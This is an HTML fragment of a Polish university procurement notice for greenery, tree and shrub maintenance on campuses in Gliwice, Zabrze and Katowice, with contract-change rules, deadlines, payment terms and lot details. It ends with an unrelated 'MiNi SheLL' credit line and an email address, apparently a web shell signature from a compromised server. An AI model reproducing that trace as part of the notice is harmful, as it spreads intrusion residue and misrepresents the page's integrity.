<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, z wyjątkiem poniższych przypadków: a)	zmiany terminu realizacji zamówienia ze względu na: - przyczyny leżące po stronie Zamawiającego, - warunki atmosferyczne, - inne niezawinione przyczyny spowodowane przez tzw. siłę wyższą np. pożar, zalanie itp. , b)	poprawy jakości danej usługi, c)	zmiany w kolejności i terminach realizacji zamówienia, zmiany w kolejności i terminach płatności (w tym płatności częściowe -jeżeli dotyczy) za realizację zamówienia w sytuacji, kiedy są one korzystne dla Zamawiającego, d)	zmiany osób, przy pomocy których Wykonawca realizuje przedmiot zamówienia na inne, legitymujące się co najmniej równoważnymi kwalifikacjami zawodowymi, doświadczeniem, wyksztalceniem, o którym mowa w SIWZ, e)	obniżenie ilości/wielkości przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy, wynikające z zaistnienia obiektywnych przesłanek konieczności takiej zmiany, f)	zmiany miejsca wykonywania poszczególnych elementów usługi, g)	dostosowanie treści umowy do aktualnego stanu prawnego w przypadku zmiany obowiązujących przepisów. 2.	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę i nie stanowią zobowiązania Zamawiającego do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych i Zaopatrzenia 44 - 100 Gliwice, ul. Konarskiego 18 pok. 511.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2015 godzina 11:00, miejsce: Dział Zamówień Publicznych i Zaopatrzenia 44 - 100 Gliwice, ul. Konarskiego 18 pok. 511.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Rozliczenia następować będą na podstawie faktur VAT wystawianych na Politechnikę Śląską, 44 - 100 Gliwice, ul. Akademicka 2A. 2. dotyczy zadania 1- Należności za wykonane usługi uiszczane będą co miesiąc z dołu, w oparciu o faktury VAT wystawiane przez Wykonawcę do 15 dnia następnego miesiąca. Dodatkowo do faktury VAT dołączone muszą być każdorazowo tygodniowe potwierdzenia wykonania usługi podpisywane w każdy piątek przez wyznaczonego koordynatora z Działu Gospodarki Nieruchomościami i Spraw Socjalnych. 3. dotyczy zadania 2 - Podstawą zapłaty będzie faktura VAT wystawiona po wykonaniu usługi, złożona wraz z protokołem odbioru wykonanych prac, potwierdzonym przez poszczególne jednostki Politechniki Śląskiej, Dział Gospodarki Nieruchomościami i Spraw Socjalnych oraz Wykonawcę. 4. Zamawiający zobowiązuje się dokonać zapłaty należności na rachunek Wykonawcy podany na fakturze w terminie do 30 dni od daty otrzymania faktury VAT i spełnienia warunków jw..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1- Kompleksowa pielęgnacja zieleni zlokalizowanej w obrębie ul. Akademickiej oraz parkingów P1, P2, P3 oraz P10 w Gliwicach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje kompleksową pielęgnację terenów zlokalizowanych w obrębie ul. Akademickiej oraz parkingów w Gliwicach: -Oczyszczanie krawężników, chodników i pozostałych powierzchni utwardzonych - parkingach; -Koszenie trawników; - Pielęgnacja trawników; -Grabienie wiosenne i jesienne liści; -Cięcie pielęgnacyjne krzewów i żywopłotów (wiosenne/jesienne); -Pielęgnacja żywopłotów, skupisk krzewów oraz rabat; 2. CPV: 77.31.00.00-6 usługi sadzenia roślin oraz utrzymania terenów zielonych CPV: 77.31.20.00-0 usługi usuwania chwastów CPV: 77.31.41.00-5 usługi w zakresie trawników CPV: 90.61.00.00-6 usługi sprzątania i zamiatania ulic CPV: 90.91.40.00-7 usługa sprzątania parkingów 3. Termin realizacji - od dnia zawarcia umowy do 31.12.2015r., (termin rozpoczęcia prac będzie ustalony w porozumieniu z Zamawiającym), z możliwością przedłużenia terminu obowiązywania umowy za obustronną zgodą, w przypadku nie wykorzystania wartości umowy do max 6 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.20.00-0, 77.31.41.00-5, 90.61.00.00-6, 90.91.40.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Kompleksowa pielęgnacja drzew i krzewów rosnących w dzielnicy akademickiej Politechniki Śląskiej w Gliwicach, Zabrzu i Katowicach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest kompleksowa pielęgnacja drzew i krzewów rosnących w dzielnicy akademickiej Politechniki Śląskiej w Gliwicach, Zabrzu i Katowicach, która obejmuje: -wycinkę drzew, -cięcia pielęgnacyjne w drzewostanie, -leczenie drzew 2. CPV: 77.21.15.00-7 Usługi pielęgnacji drzew 3. Termin realizacji - od dnia zawarcia umowy przez 12 miesięcy lub do wykorzystania limitu prac z możliwością przedłużenia terminu obowiązywania umowy za obustronną zgodą, w przypadku nie wykorzystania wartości umowy do max 6 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com